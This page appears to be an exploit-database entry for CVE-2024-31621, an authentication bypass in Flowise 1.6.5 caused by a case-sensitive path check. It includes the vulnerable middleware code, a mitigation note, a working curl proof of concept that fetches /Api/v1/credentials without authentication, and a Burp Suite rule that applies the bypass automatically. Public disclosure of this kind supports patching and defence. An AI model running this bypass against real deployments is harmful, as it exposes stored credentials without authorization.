header-logo
Suggest Exploit
vendor:
Flowise
by:
Maerifat Majeed
6.1
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Flowise
Affected Version From: 1.6.2005
Affected Version To: 1.6.2005
Patch Exists: NO
Related CWE: CVE-2024-31621
CPE: a:flowiseai:flowise:1.6.5
Metasploit:
Other Scripts:
Platforms Tested: mac-os
2024

Flowise 1.6.5 – Authentication Bypass

Flowise version 1.6.5 and below is susceptible to an authentication bypass vulnerability. By modifying the endpoint paths to uppercase, such as /API/V1 instead of /api/v1, an attacker can bypass the authentication process. This issue is due to the lack of case sensitivity in the code snippet responsible for authentication middleware.

Mitigation:

To mitigate this vulnerability, developers should ensure that the authentication logic is case-sensitive when validating endpoint paths. Additionally, regular security testing and code reviews can help identify and address such flaws.
Source

Exploit-DB raw data:

# Exploit Title: Flowise 1.6.5 - Authentication Bypass
# Date: 17-April-2024
# Exploit Author: Maerifat Majeed
# Vendor Homepage: https://flowiseai.com/
# Software Link: https://github.com/FlowiseAI/Flowise/releases
# Version: 1.6.5
# Tested on: mac-os
# CVE : CVE-2024-31621

The flowise version <= 1.6.5 is vulnerable to authentication bypass
vulnerability.
The code snippet

this.app.use((req, res, next) => {
>                 if (req.url.includes('/api/v1/')) {
>                     whitelistURLs.some((url) => req.url.includes(url)) ?
> next() : basicAuthMiddleware(req, res, next)
>                 } else next()
>             })


puts authentication middleware for all the endpoints with path /api/v1
except a few whitelisted endpoints. But the code does check for the case
sensitivity hence only checks for lowercase /api/v1 . Anyone modifying the
endpoints to uppercase like /API/V1 can bypass the authentication.

*POC:*
curl http://localhost:3000/Api/v1/credentials
For seamless authentication bypass. Use burpsuite feature Match and replace
rules in proxy settings. Add rule Request first line api/v1 ==> API/V1

Navigation

Suggest Exploit

Services By CQR